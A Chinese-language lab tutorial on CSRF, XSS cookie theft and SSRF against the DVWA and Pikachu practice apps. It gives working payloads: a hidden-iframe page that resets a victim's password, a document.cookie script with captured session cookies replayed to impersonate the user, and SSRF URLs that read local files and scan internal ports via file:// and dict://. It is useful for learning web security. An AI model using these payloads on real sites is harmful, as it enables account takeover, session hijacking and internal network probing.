CSRF+XSRF+SSRF简单介绍
CSRF
使用DVWA靶机,选择low级别,然后更改密码


伪造网页连接
http://localhost:8083/DVWA-master/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change#
我们自己写一个网页,把上面的网页连接写在里面,并更改里面的密码
<iframe hidden=""src="http://localhost:8083/DVWA-master/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#"width="" height=""></iframe>
使用iframe标签,里面的hidden是为了隐藏这个连接页面的
这个img标签是为了优化网页内容的

被攻击者访问这个页面
前提是,被攻击者仍然使用着这个正确网页并用相同的浏览器打开我们发送的网页(由于cookie的原因)
这我们就把密码改成了我们自己设计的
XSRF
网站有xss漏洞
我们登录网站,上传存储型xss,获取目标用户的cookie值,一般用xss平台。这里为了演示,我们手动获取对方的cookie值
首先攻击方为火狐浏览器,先上传xss
<script>console.log(document.cookie)</script>
console.log(document.cookie)

这里是为了实验,用xss我们可以直接获取cookie
security=low; BEEFHOOK=HREwKDaS8h44nT2sUWZZxRDug1kS6cXCCfzDmbMia50Cg2A2cBXDbRmGKckYiFBh74ZdQH3JM6z9flVA;
PHPSESSID=armhiqtko1ja6i8h4eas7ogmu4

使用cookie登录
我们可以用别人的cookie进行身份冒充
现在我们对cookie进行修饰
document.cookie="security=low";
document.cookie="BEEFHOOK=HREwKDaS8h44nT2sUWZZxRDug1kS6cXCCfzDmbMia50Cg2A2cBXDbRmGKckYiFBh74ZdQH3JM6z9flVA";
document.cookie="PHPSESSID=armhiqtko1ja6i8h4eas7ogmu4";
然后我们进入登录界面输入cookie

由于我们当时是在这个页面获取cookie的,因此我们登录这个页面http://localhost:8083/DVWA-master/vulnerabilities/xss_s/


我们就可以随意访问这个网站了
SSRF

file://可以访问本地文件http://localhost/pikachu-master/vul/ssrf/ssrf_curl.php?url=file://c:\zz\2.txt

http://可以访问互联网文件http://localhost/pikachu-master/vul/ssrf/ssrf_curl.php?url=http://192.168.1.130/1.txt

dict://扫秒端口http://localhost/pikachu-master/vul/ssrf/ssrf_curl.php?url=dict://192.168.1.47:80

CSRF+XSRF+SSRF简单介绍的更多相关文章
- 跨站请求伪造 CSRF / XSRF<一:介绍>
跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一 ...
- CSRF简单介绍及利用方法-跨站请求伪造
0x00 简要介绍 CSRF(Cross-site request forgery)跨站请求伪造,由于目标站无token/referer限制,导致攻击者可以用户的身份完成操作达到各种目的.根据HTTP ...
- CSRF简单介绍及利用方法
x00 简要介绍 CSRF(Cross-site request forgery)跨站请求伪造,由于目标站无token/referer限制,导致攻击者可以用户的身份完成操作达到各种目的.根据HTTP请 ...
- ABP官方文档翻译 6.7 CSRF/XSRF保护
CSRF/XSRF保护 介绍 HTTP动词 非浏览器客户端 ASP.NET MVC 特征 集成 布局视图 配置 ASP.NET Web API 特征 集成 集成到ASP.NET MVC客户端 集成到其 ...
- ASP.NET MVC CSRF (XSRF) security
CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站 ...
- CSRF/XSRF 跨站请求伪造
CSRF/XSRF 跨站请求伪造 CSRF(Cross Site Request Forgery, 跨站域请求伪造)也称 XSRF, 是一种网络的攻击方式,它在 2007 年曾被列为互联网 20 大安 ...
- asp.netcore mvc 防CSRF攻击,原理介绍+代码演示+详细讲解
一.CSRF介绍 1.CSRF是什么? CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session ridin ...
- XSS、CSRF、SSRF联系&区别,防御
目录 区别和联系 防御 联系和区别 相同点: XSS,CSRF,SSRF三种常见的Web服务端漏洞均是由于,服务器端对用户提供的可控数据过于信任或者过滤不严导致的. 相同点: XSS,CSRF,SSR ...
- [原创]关于mybatis中一级缓存和二级缓存的简单介绍
关于mybatis中一级缓存和二级缓存的简单介绍 mybatis的一级缓存: MyBatis会在表示会话的SqlSession对象中建立一个简单的缓存,将每次查询到的结果结果缓存起来,当下次查询的时候 ...
随机推荐
- 【源码分析】- 在SpringBoot中你会使用REST风格处理请求吗?
目录 前言 1.什么是 REST 风格 1.1 资源(Resources) 1.2 表现层(Representation) 1.3 状态转化(State Transfer) 1.4 综述 ...
- MySQL到ClickHouse实时同步-CloudCanal实战
简述 CloudCanal 近期实现了 MySQL(RDS) 到 ClickHouse 实时同步的能力,功能包含全量数据迁移.增量数据迁移.结构迁移能力,以及附带的监控.告警.HA等能力(平台自带). ...
- 10、修改windows编码集
10.1.查看Windows的字符集编码: 1.方法一: (1) 同时按住"windows"徽标键和"r"键,在弹出的"运行"框中输入&qu ...
- 9、解决mstsc卡顿的问题:
1.同时按住"win+r"键调出"运行",在方框内输入"cmd"后点击"确定"打开dos窗口: 2.在dos中输入&qu ...
- js 获取系统当前时间,判断时间大小
1.获取系统当前时间 getNowTime(tempminit) { if (!tempminit) { tempminit = 0; } var date = new Date(); date.se ...
- 记一次ios下h5页面图片显示问题
刚入职公司时做了一个移动端图片预览的组件,之前也有业务组用过,没发现什么问题,但是这次有两个很诡异的问题. 一个是老数据的图不显示,另一个是图片点击预览只显示一部分加载不全.之所以诡异是所有设备都没问 ...
- ubuntu 替换某一内核模块
流程 方法一 以下配置仅执行一次,并以 linux kernel 3.13.0 为例 $ cd ~ $ apt-get source linux-source-3.13.0 $ cd linux-3. ...
- 痞子衡嵌入式:对比i.MXRT与LPC在RTC外设GPREG寄存器使用上的异同
大家好,我是痞子衡,是正经搞技术的痞子.今天痞子衡给大家介绍的是对比i.MXRT与LPC在RTC外设GPREG寄存器使用上的异同. 本篇是 <在SBL项目实战中妙用i.MXRT1xxx里Syst ...
- Spring:Spring的各jar包依赖及作用详解
spring-core.jar(必须有的核心jar包) 这个jar 文件包含Spring 框架基本的核心工具类.Spring 其它组件要都要使用到这个包里的类,是其它组件的基本核心,当然你也可以在自己 ...
- 资源:Hadoop安装包下载路径
下载路径 Hadoop所有版本:http://archive.apache.org/dist/hadoop/common/